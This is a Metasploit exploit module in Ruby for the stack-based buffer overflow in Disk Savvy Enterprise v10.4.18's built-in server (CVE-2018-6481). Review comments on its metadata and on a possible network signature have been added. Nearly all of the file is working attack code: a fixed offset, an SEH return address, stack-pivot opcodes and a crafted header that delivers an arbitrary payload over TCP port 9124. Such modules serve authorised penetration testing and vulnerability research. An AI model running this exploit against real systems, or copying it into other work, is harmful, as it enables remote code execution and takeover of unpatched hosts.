Path: blob/master/modules/exploits/windows/misc/disk_savvy_adm.rb
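##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for the stack-based buffer overflow in the
# built-in server of Disk Savvy Enterprise v10.4.18 (CVE-2018-6481).
#
# Review notes:
# - The reference list is keyed 'References'. Under a misspelled key the CVE
#   entry is not attached to the module, so CVE-based search and any
#   vulnerability-to-module mapping built on it would miss this module.
# - 'Notes' declares reliability, stability and side effects as UNKNOWN; none
#   of them has been assessed here, so service impact on the target is not
#   characterised.
# - 'Privileged' => true is the author's declaration about the resulting
#   session; the account the vulnerable service runs under is not visible in
#   this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata and the default remote port (9124).
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Disk Savvy Enterprise v10.4.18',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in Disk Savvy Enterprise v10.4.18, caused by improper bounds
          checking of the request sent to the built-in server. This module
          has been tested successfully on Windows 7 SP1 x86.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Daniel Teixeira'
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          'BadChars' => "\x00\x02\x0a\x0d\xf8",
          'Space' => 800
        },
        # Key corrected from 'Referencess' so the CVE reference is registered.
        'References' => [
          [ 'CVE', '2018-6481' ]
        ],
        'Targets' => [
          [
            'Disk Savvy Enterprise v10.4.18',
            {
              'Offset' => 124,
              'Ret' => 0x10056d13
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2017-01-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(9124)])
  end

  # Builds a single request and writes it to the connected TCP socket.
  #
  # The request is a 24-byte header followed by the body. The header holds
  # three fixed 4-byte values, the body length twice as 32-bit little-endian
  # integers, and the value of the body's final byte as a 32-bit
  # little-endian integer.
  #
  # NOTE(review): the first 12 header bytes are constant and the two length
  # fields are always equal. On the defensive side these could anchor a
  # network signature for the service port, but whether legitimate clients
  # send the same prefix is not visible here. Confirm against normal traffic
  # before alerting on it.
  def exploit
    seh = generate_seh_record(target.ret)
    connect

    buffer = make_nops(target['Offset'])
    buffer << seh
    buffer << "\x83\xc4\x7f" * 13 # ADD esp,7fh
    buffer << "\x83\xc4\x21" # ADD esp,21h
    buffer << "\xff\xe4" # JMP esp
    buffer << payload.encoded
    # One random trailing byte; its value is echoed in the last header field.
    buffer << Rex::Text.rand_text_alphanumeric(1)

    header = "\x75\x19\xba\xab"
    header << "\x03\x00\x00\x00"
    header << "\x00\x40\x00\x00"
    header << [buffer.length].pack("V")
    header << [buffer.length].pack("V")
    header << [buffer[-1].ord].pack("V")
    packet = header
    packet << buffer

    sock.put(packet)
    handler
  end
end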